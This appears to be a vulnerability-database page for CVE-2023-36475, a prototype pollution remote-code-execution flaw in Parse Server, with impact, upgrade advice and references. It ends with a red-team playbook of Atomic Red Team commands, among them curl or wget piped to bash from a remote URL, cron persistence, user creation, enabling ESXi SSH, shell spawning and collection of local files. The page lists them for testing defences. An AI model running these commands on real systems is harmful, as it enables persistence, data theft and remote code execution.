CVE-2023-36475
Overview
This vulnerability is a prototype pollution flaw within the MongoDB BSON parser used by the Parse Server backend. The root cause lies in unsafe handling of object prototypes during BSON deserialization, allowing an attacker to manipulate the prototype chain of JavaScript objects. The affected component is the BSON parser embedded in Parse Server versions prior to 5.5.2 and 6.2.1, which processes incoming data without sufficient validation against prototype pollution vectors.
Vulnerability Description
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 5.5.2 and 6.2.1, an attacker can use a prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. A patch is available in versions 5.5.2 and 6.2.1.
Impact
An unauthenticated attacker can remotely execute arbitrary code on affected Parse Server instances by exploiting the prototype pollution vulnerability in the BSON parser. This allows full compromise of the backend infrastructure, including unauthorized data access, manipulation, or service disruption. The vulnerability requires no user interaction and no privileges (AV:N/AC:L/PR:N/UI:N), resulting in high confidentiality, integrity, and availability impacts as reflected by the CVSS 9.8 score.
Solution
Upgrade Parse Server to version 5.5.2 or 6.2.1 or later, where the prototype pollution vulnerability in the BSON parser has been patched. Refer to the official Parse Server security advisory GHSA-462x-c3jw-7vr6 on GitHub for detailed patch instructions and version-specific remediation guidance. No alternative workarounds are documented; applying the vendor-provided updates is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Parse Server, an open-source backend framework that operates on Node.js, stems from a flaw in the way the MongoDB BSON parser handles prototype pollution. This issue allows an attacker to manipulate the prototype of objects, which can lead to unexpected behavior in the application. Specifically, the vulnerability enables an attacker to craft malicious input that alters the prototype of built-in objects, potentially allowing for the execution of arbitrary code on the server. This is particularly concerning given the widespread use of Parse Server in various applications, as it can expose sensitive data and compromise the integrity of the server environment.
Exploitation of this vulnerability can occur through several attack vectors. An attacker might send specially crafted requests to the Parse Server, leveraging the prototype pollution sink to inject malicious payloads. This could be done via API endpoints that process user input, such as those handling JSON data. Once the payload is executed, the attacker could gain control over the server, allowing them to execute arbitrary commands, manipulate data, or even pivot to other systems within the network. The ease of exploitation, combined with the high impact of successful attacks, makes this vulnerability particularly dangerous for organizations relying on Parse Server for their backend operations.
The real-world impact of this vulnerability is significant, especially for businesses that utilize Parse Server to manage critical applications and data. A successful exploitation could lead to data breaches, unauthorized access to sensitive information, and disruption of services. The potential for remote code execution means that attackers could deploy malware, exfiltrate data, or even use the compromised server as a launchpad for further attacks against other systems. The financial and reputational damage resulting from such incidents can be substantial, leading to loss of customer trust, regulatory penalties, and extensive recovery costs.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Parse Server (5.5.2 and 6.2.1 or later) as soon as possible. Regularly updating software components is a fundamental best practice in cybersecurity, as it helps close known vulnerabilities. Additionally, implementing robust input validation and sanitization measures can help prevent the injection of malicious payloads. Monitoring server logs for unusual activity and employing intrusion detection systems can also aid in identifying potential exploitation attempts. Organizations should conduct regular security assessments and penetration testing to evaluate their defenses against such vulnerabilities and ensure that their security posture remains strong.
In conclusion, the vulnerability within Parse Server presents a critical risk that organizations must address promptly. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves to defend against exploitation. Proactive measures, including timely updates and enhanced security practices, are essential in mitigating the risks associated with this and similar vulnerabilities, ultimately safeguarding their applications and data from malicious actors.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Parseplatform | Parse-Server | All |
cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
|
|
|
Parseplatform | Parse-Server | All |
cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36475 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/parse-community/parse-server/security/advisories/GHSA-462x-c3jw-7vr6 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/issues/8674 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/issues/8675 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/commit/3dd99dd80e27e5e1d99b42844180546d90c7aa90 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/commit/5fad2928fb8ee17304abcdcf259932f827d8c81f |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/releases/tag/5.5.2 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/releases/tag/6.2.1 |